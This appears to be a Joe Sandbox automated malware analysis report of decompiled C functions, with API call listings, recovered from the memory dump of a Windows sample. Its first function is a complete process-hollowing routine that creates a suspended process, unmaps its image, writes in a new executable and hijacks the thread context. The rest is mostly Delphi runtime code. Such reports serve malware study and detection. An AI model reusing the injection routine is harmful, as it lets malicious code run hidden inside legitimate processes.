    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
